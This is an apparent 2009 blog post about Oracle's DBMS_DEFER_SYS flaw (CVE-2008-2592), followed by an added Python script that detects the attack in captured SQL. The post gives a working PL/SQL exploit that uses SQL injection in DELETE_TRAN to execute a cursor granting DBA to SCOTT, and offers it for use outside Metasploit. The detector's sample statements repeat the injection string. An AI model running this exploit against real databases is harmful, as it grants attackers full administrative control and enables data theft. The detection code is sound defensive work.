DBMS_DEFER_SYS; CVE-2008-2592

October 1, 2009

The exploit for this vulnerability is in Metasploit, but I could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008.

So, if you need to use it outside Metasploit, here it is:

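DECLARE
  D NUMBER;
BEGIN
  -- Parse (without executing) an autonomous block that grants DBA to SCOTT
  D := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
  -- SQL injection in the second argument: the injected predicate executes cursor D
  DBMS_DEFER_SYS.DELETE_TRAN('aaaaaa','a'' and dbms_sql.execute('||D||')=1--');
END;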
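
A defender-side check for the call pattern above, added here as an example and not part of the original post: it decodes the string literals passed to DBMS_DEFER_SYS.DELETE_TRAN in captured SQL text and reports embedded quotes, DBMS_SQL references and comment markers. The function names and sample statements are constructed, the SQL text is assumed to come from an audit trail or trace, and q-quoted literals are not handled.

```python
import re

CALL = re.compile(r"dbms_defer_sys\s*\.\s*delete_tran\s*\(", re.I)
CHECKS = [  # what a literal argument to DELETE_TRAN should never contain
    ("embedded quote", re.compile(r"'")),
    ("dbms_sql reference", re.compile(r"dbms_sql\s*\.", re.I)),
    ("comment marker", re.compile(r"--|/\*")),
]

# Constructed statements standing in for audit-trail SQL text.
SAMPLE_STATEMENTS = [
    "BEGIN DBMS_DEFER_SYS.DELETE_TRAN('1.2.3', 'REMOTE.EXAMPLE.COM'); END;",
    "BEGIN DBMS_DEFER_SYS.DELETE_TRAN('aaaaaa','a'' and dbms_sql.execute('||D||')=1--'); END;",
    "SELECT ename FROM emp WHERE ename = 'O''Brien'",
]

def plsql_literals(sql):
    """Decode every '...' literal in sql; a doubled '' inside one is a quote."""
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] != "'":
            i += 1
            continue
        i, buf = i + 1, []
        while i < n:
            if sql[i] == "'" and sql[i + 1:i + 2] == "'":
                buf.append("'")   # escaped quote stays inside the literal
                i += 2
            elif sql[i] == "'":
                i += 1            # closing quote
                break
            else:
                buf.append(sql[i])
                i += 1
        out.append("".join(buf))
    return out

def delete_tran_findings(sql):
    """Reasons a DELETE_TRAN call looks injected; [] if clean or absent."""
    m = CALL.search(sql)
    if not m:
        return []
    reasons = []
    for lit in plsql_literals(sql[m.end():]):  # literals after the call site
        for name, rx in CHECKS:
            if rx.search(lit) and name not in reasons:
                reasons.append(name)
    return reasons

if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        print(delete_tran_findings(stmt) or "ok", "<-", stmt)
```

Decoding the literals first matters: the doubled quote in the second argument only shows up as a string breakout once `''` is collapsed to a single quote.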
